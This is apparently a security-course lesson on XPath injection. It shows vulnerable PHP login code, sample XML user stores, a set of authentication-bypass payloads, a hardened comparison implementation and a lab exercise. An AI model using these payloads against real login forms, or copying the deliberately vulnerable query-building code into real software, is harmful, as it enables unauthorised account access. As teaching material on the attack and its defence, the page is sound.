Injection Attacks
XPath - Authentication Bypass
Now that we have a basic idea of XPath query syntax, let us start with XPath injection. XPath injections, similar to SQL injections, can be weaponized to bypass web authentication. We will discuss such a scenario in this section.
Foundation
Before jumping into discovering and exploiting authentication bypasses via XPath injection, we first need to discuss how authentication via XPath queries may be implemented. As an example, let us consider an XML document that stores user data like this:
<users>
  <user>
    <name first="Kaylie" last="Grenvile"/>
    <id>1</id>
    <username>kgrenvile</username>
    <password>P@ssw0rd!</password>
  </user>
  <user>
    <name first="Admin" last="Admin"/>
    <id>2</id>
    <username>admin</username>
    <password>admin</password>
  </user>
  <user>
    <name first="Academy" last="Student"/>
    <id>3</id>
    <username>htb-stdnt</username>
    <password>Academy_student!</password>
  </user>
</users>
To perform authentication, the web application might execute an XPath query like the following:
/users/user[username/text()='htb-stdnt' and password/text()='Academy_student!']
Vulnerable PHP code inserts the username and password without prior sanitization into the query:
$query = "/users/user[username/text()='" . $_POST['username'] . "' and password/text()='" . $_POST['password'] . "']";
$results = $xml->xpath($query);
We aim to bypass authentication by injecting a username and password such that the XPath query always evaluates to true. We can achieve this by injecting the value ' or '1'='1 as username and password. The resulting XPath query looks like this:
/users/user[username/text()='' or '1'='1' and password/text()='' or '1'='1']
In XPath, and binds tighter than or, so the predicate reads as '' or ('1'='1' and password/text()='') or '1'='1', which is always true because of the trailing '1'='1'. The query therefore returns all user element nodes from the XML document, and we are logged in as the first user. In our example document, this is the user kgrenvile. However, what if we want to log in as the admin user to obtain the highest permissions? In that case, we have to inject a username of admin' or '1'='1 and an arbitrary value for the password. That way, the resulting XPath query looks like this:
/users/user[username/text()='admin' or '1'='1' and password/text()='abc']
Due to the or clause, the above query will log us in as the admin user without providing the correct password.
Exploitation
In real-world scenarios, passwords are often hashed. Additionally, we might not know a valid username; therefore, we cannot use the abovementioned payloads. Fortunately, we can use more advanced injection payloads to bypass authentication in such cases. Consider the following example:
<users>
  <user>
    <name first="Kaylie" last="Grenvile"/>
    <id>1</id>
    <username>kgrenvile</username>
    <password>8a24367a1f46c141048752f2d5bbd14b</password>
  </user>
  <user>
    <name first="Admin" last="Admin"/>
    <id>2</id>
    <username>obfuscatedadminuser</username>
    <password>21232f297a57a5a743894a0e4a801fc3</password>
  </user>
  <user>
    <name first="Academy" last="Student"/>
    <id>3</id>
    <username>htb-stdnt</username>
    <password>295362c2618a05ba3899904a6a3f5bc0</password>
  </user>
</users>
In this case, the vulnerable PHP code may look like this:
$query = "/users/user[username/text()='" . $_POST['username'] . "' and password/text()='" . md5($_POST['password']) . "']";
$results = $xml->xpath($query);
Since the password is hashed before being inserted into the query, injecting a username and password of ' or '1'='1 will result in the following query:
/users/user[username/text()='' or '1'='1' and password/text()='59725b2f19656a33b3eed406531fb474']
This query does not return any nodes; thus, we cannot bypass authentication this way. Since we also do not know any valid username, we cannot bypass authentication with the payloads discussed so far.
Firstly, we can inject a double or clause in the username to make the XPath query return true, thereby returning all user nodes such that we log in as the first user. An example payload would be ' or true() or ' resulting in the following query:
/users/user[username/text()='' or true() or '' and password/text()='59725b2f19656a33b3eed406531fb474']
Because true() is a disjunct of its own, the predicate is true for every user node regardless of the password hash, so the query returns all users and we bypass the authentication. However, as discussed previously, we might want to log in as a specific user to obtain more privileges.
One way to do this is to iterate over all users by their position. This can be achieved with the following payload: ' or position()=2 or ', resulting in the following query:
/users/user[username/text()='' or position()=2 or '' and password/text()='59725b2f19656a33b3eed406531fb474']
This will return only the second user node. We can increment the position to iterate over all users until we find the user we seek. There might be millions of users in real-world deployments, so this manual technique quickly becomes infeasible. Instead, we can search for specific users if we know part of the username. For this, consider the following payload: ' or contains(.,'admin') or ', resulting in the following query:
/users/user[username/text()='' or contains(.,'admin') or '' and password/text()='59725b2f19656a33b3eed406531fb474']
This query returns all user nodes whose string value (the concatenation of all descendant text nodes) contains the string admin. Since the username node is a child of the user node, this returns all users that contain the substring admin in the username.
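As an added example (not code from the original page), the vulnerable query builder from the text is shown beside a hardened login that keeps untrusted input out of the XPath predicate, and the three payloads above are replayed against both. The document is constructed to mirror the hashed-password example, the function names vulnerableLogin and hardenedLogin are hypothetical, and md5 is kept only to match the text.

```php
<?php
// Constructed document mirroring the hashed-password example in the text; the
// hashes are computed here so the sample is self-consistent.
$doc = '<users>'
     . '<user><name first="Kaylie" last="Grenvile"/><id>1</id><username>kgrenvile</username>'
     . '<password>' . md5('P@ssw0rd!') . '</password></user>'
     . '<user><name first="Admin" last="Admin"/><id>2</id><username>obfuscatedadminuser</username>'
     . '<password>' . md5('admin') . '</password></user>'
     . '<user><name first="Academy" last="Student"/><id>3</id><username>htb-stdnt</username>'
     . '<password>' . md5('Academy_student!') . '</password></user>'
     . '</users>';
$xml = new SimpleXMLElement($doc);

// Vulnerable builder from the text: both inputs are concatenated into the predicate.
// Returns the usernames of every node the (possibly injected) predicate matches.
function vulnerableLogin(SimpleXMLElement $xml, string $user, string $pass): array
{
    $query = "/users/user[username/text()='" . $user
           . "' and password/text()='" . md5($pass) . "']";
    $nodes = $xml->xpath($query) ?: [];
    return array_map(fn($n) => (string) $n->username, $nodes);
}

// Hardened variant (hypothetical name): the username must match a strict allow-list
// before it is placed in the query, so quotes, brackets and XPath functions never
// reach the predicate; the password is not put into XPath at all. The node is
// fetched by username only and the stored hash is compared in PHP with hash_equals().
// md5 is kept only to match the text; real code would use password_hash/password_verify.
function hardenedLogin(SimpleXMLElement $xml, string $user, string $pass): ?string
{
    if (!preg_match('/^[a-z0-9_-]{1,32}$/', $user)) {
        return null;                                   // input outside the allow-list
    }
    $nodes = $xml->xpath("/users/user[username/text()='" . $user . "']") ?: [];
    if (count($nodes) !== 1) {
        return null;                                   // unknown or ambiguous username
    }
    $stored = (string) $nodes[0]->password;
    return hash_equals($stored, md5($pass)) ? (string) $nodes[0]->username : null;
}

// Replay the three payloads from the text against both implementations.
foreach (["' or true() or '", "' or position()=2 or '", "' or contains(.,'admin') or '"] as $p) {
    printf("%-32s vulnerable: %-45s hardened: %s\n", $p,
        json_encode(vulnerableLogin($xml, $p, 'anything')),
        var_export(hardenedLogin($xml, $p, 'anything'), true));
}
// A legitimate login still succeeds through the hardened path.
var_dump(hardenedLogin($xml, 'htb-stdnt', 'Academy_student!'));
```

The allow-list check is what stops the injection; the hash comparison in PHP is the second layer that removes the password from the query entirely, so even a username that somehow slipped through could not be combined with a password-side payload.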
Questions
Authenticate to with user "htb-stdnt" and password "Academy_student!"